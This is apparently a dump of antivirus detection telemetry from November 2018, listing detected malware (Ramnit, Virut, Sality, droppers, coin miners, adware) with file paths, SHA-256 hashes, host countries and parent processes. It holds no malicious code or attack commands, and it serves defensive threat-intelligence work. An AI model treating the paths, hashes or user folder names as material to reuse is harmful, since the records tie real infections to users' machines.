  Row(detection=Row(filename='avscan-20181101-075834-c76afd03', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_58cdea1d\\AVSCAN-20181101-073845-21B9BF28\\AVSCAN-20181101-075834-C76AFD03', filesize=704000, name='TR/ExtenBro.uhnh.#M1.#R1'), hash='282bb8f9b8984fb10974def745e9265749846985dc654ced8f7add19443f01a5', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:58:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='instdemo.exe', filepath='C:\\Program Files\\Lenovo\\FastBoot\\InstDemo.exe', filesize=384000, name='W32/Jeefo.A.#M1.#R1'), hash='596d0718432fc89852f4b142871a8680138a4964e4de55a01d151d4435d908bc', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:r1eWu4mjkUSPX8uG.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T09:57:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T14:26:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='\\\\?\\C:\\Program Files (x86)\\InstallShield Installation Information\\{28006915-2739-4EBE-B5E8-49B25D32EB33}\\setup.exe', filesize=848000, name='HEUR/APC.#M1.#R1'), hash='71155fe30452fc799372b8c7a769faf3a85af0d59a8ae344f85cb6a3807d751e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:46:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T16:03:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ioc8a7a0bad-cfd6-334d-a069-b5427d5f744e.exe', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP18.0.0\\Temp\\ioc8A7A0BAD-CFD6-334D-A069-B5427D5F744E.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T00:03:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000b2b7c', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000b2b7c', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:54:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T01:56:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='logonui.exe', filepath='\\?\\C:\\Windows\\Fonts\\logonUi.exe', filesize=1024000, name='TR/Agent.bqqua.#M1.#R1'), hash='73c6c7614b1b20ea6085c1592248dfc26aedd72f3865eccb02b6f5f7fae6ee11', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T16:42:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-114348-57bbaade', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-114343-56C9B1AE\\AVSCAN-20181101-114348-57BBAADE', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:43:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-222618-e28a5af2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_070199db\\AVSCAN-20181101-222604-E0C05C74\\AVSCAN-20181101-222618-E28A5AF2', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T21:20:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003403-840fdcf1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28e34e72\\AVSCAN-20181101-234504-1DD013D9\\AVSCAN-20181102-003403-840FDCF1', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:37:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ba09768c032e14bc3412e0d67993922b065cd609', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\ba09768c032e14bc3412e0d67993922b065cd609', filesize=384000, name='HEUR/AGEN.1029348.#M1.#R1'), hash='1a289429fb3b879ea9dd9b4ca2f6d116faacd62b2d046694f7fbe9bde16baf88', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T02:39:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-090757-15c5dad9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9aa61a38\\AVSCAN-20181101-224746-B47ADADF\\AVSCAN-20181102-090757-15C5DAD9', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:33:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a48fec91bcba9d171bd1729342e7e51e138474171d3a93dff1765e0c33a3a9be', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\A48FEC91BCBA9D171BD1729342E7E51E138474171D3A93DFF1765E0C33A3A9BE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a48fec91bcba9d171bd1729342e7e51e138474171d3a93dff1765e0c33a3a9be', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:27:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152425-a51fcad0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152425-A51FCAD0', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:24:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='systm.exe', filepath='C:\\Users\\X\\Desktop\\OrganiZen\\Tümü bir arada 29-09-2017\\csduragi_cs16\\new2\\systm.exe', filesize=1472000, name='W32/Ramnit.C.#M1.#R1'), hash='9b861b0a70f3ed516a9b36b828f80c4a0aa63204cf38ec00c73bb5b4d9a9611b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:HbRxC8X4hEyKh6V3.1', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T09:42:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='c44bf00a9096001dbacb189645c9ac669ba56d81646d57f83d22c637cdd475e1', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:14:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151632-4a91ef13', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151632-4A91EF13', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:16:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151955-717afafe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151955-717AFAFE', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:20:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150249-7115d71c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d5e1c00c\\AVSCAN-20181101-150142-63076B81\\AVSCAN-20181101-150249-7115D71C', filesize=64000, name='TR/Dropper.Gen.#M300.#R1736'), hash='887e1ab2eaf3228bd8b604427b4510bc8c5dd50748e04fbb7eb539371fe310d0', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:02:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unityengine.networking.dll', filepath='G:\\Steam\\steamapps\\common\\Streets of Rogue\\StreetsOfRogue_Data\\Managed\\UnityEngine.Networking.dll', filesize=256000, name='HEUR/AGEN.1019617.#M1.#R1'), hash='c4fd73aed6c56d4468b3ae01758909e82a2c5fcee022a8601dc3067725bf2f8d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T19:44:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093704-a9c956a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093704-A9C956A1', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:37:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mylbotmslqts.bat', filepath='E:\\mylbotmslqts.bat', filesize=512000, name='TR/Taranis.2886.#M0.#R0'), hash='eeb30022f7c3503064471543d222174092dacb7e964ee1ea21f0c4fe8a60e3ec', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T02:55:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gcaclientdll.dll', filepath='E:\\Program Files (x86)\\LANGames\\gcaclientdll.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='9a463b51b6d9cda67bd20dd63a75c22fc6f252da0b3d43386a478397bd825cc5', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=450512, timestamp='2018-11-01T15:57:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='8a09a30645885737b1b40007c9da1460bfcebb22fa369cf17f9de8f8efe37345', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T20:46:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094804-2849add9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094804-2849ADD9', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:48:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='moduli engim.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:09:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='9817ab650882f71b16a47cdef489c0c1edde5abeec990a9c55e601cc33cab0d3', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T02:46:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pfi oss 582579.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\STAGE 2016-2017\\PFI OSS 582579.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:18:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='prospetti moduli didattici.exe', filepath="E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\SERVIZI\\ADDETTI ALL'ATTIVITA' FUNEBRE\\prospetti moduli didattici.exe", filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:12:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hjlmamfp.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\hjlMaMfP.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nso2087.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='\\Device\\Mup\\LANDISK-CAC925\\disk\\アプリ\\複数の写真を1枚にまとめたい時は画像編集ソフト「Fotor」\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=None, timestamp='2018-11-01T04:11:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095050-48181975', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095050-48181975', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:50:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='.fseventsd.exe', filepath='H:\\.fseventsd.exe', filesize=384000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-01T21:15:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='C:\\Program Files (x86)\\Common Files\\microsoft shared\\DW\\DWTRIG20.EXE', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='9cba9ef1e8dd4bb883f628fc9a51cbdbedc4ce2eb00ca42212ccce321e7d7f9e', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:21:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T16:49:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\AppData\\Local\\WinMiner\\Miners\\EWBF64_0.3.4\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/startup', country='BN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\WinMiner1.7\\WinMiner.exe', parentsize=4509712, timestamp='2018-11-04T13:53:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T01:52:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001f183', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001f183', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:21:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\破解檔\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='7a538353346d1a0bca614a50c14e009fddf625772e54ea6a1fbe171df460074c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:M2lv44Lh9kuhRVWb.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T19:39:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00018c54', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00018c54', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:07:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-155600-ee809080', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_6bb2b461\\AVSCAN-20181104-154942-C4D2A19E\\AVSCAN-20181104-155600-EE809080', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='2ffa0baef8f7fe1c15fddfbf27e2355e9ead317e07726d0bc12cd7bbfaf5eb6e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:56:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-225340-02b80b2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-224749-D7F124B9\\AVSCAN-20181104-225340-02B80B2D', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:53:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Docume~1\\\\\\\\AllUse~1\\\\\\\\Templates\\\\\\\\1.vbs\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-04T02:21:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b.exe', filepath='C:\\ProgramData\\TakETheCoupon\\B.exe', filesize=704000, name='ADWARE/MultiPlug.Gen.#M300.#R6864'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T11:59:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='individual assignment 6 _ nthnhung.exe', filepath='G:\\\xa0\\VET\\Individual Assignment 6 _ NTHNhung.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='9c7e8d7c836cde47e241518fdae083b02f328646b82766449797c2645a7750e2', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-04T09:18:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215503-6631b450', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-215503-6631B450', filesize=64000, name='TR/Siggen.64000.3.#M1.#R1'), hash='55ef4bb343cacd348db91d63b011d0d8004df3db4cf79d0abbfefbe248e9491c', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:55:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-04T23:20:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\Mining\\bbtmultiminer-master\\Miners\\ZEC_M0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FI', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T18:14:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='oeaw0c92d3d.dll', filepath='\\\\?\\C:\\Windows\\OeAW0c92d3d.dll', filesize=192000, name='Adware/Elex.xjuch.#M1.#R1'), hash='50450cd74f7e00ab23864f3a22f66217446dc76563594c16209c7d84999ca55d', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:35:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T18:01:03Z'), dt=datetime.date(2018, 11, 4)),
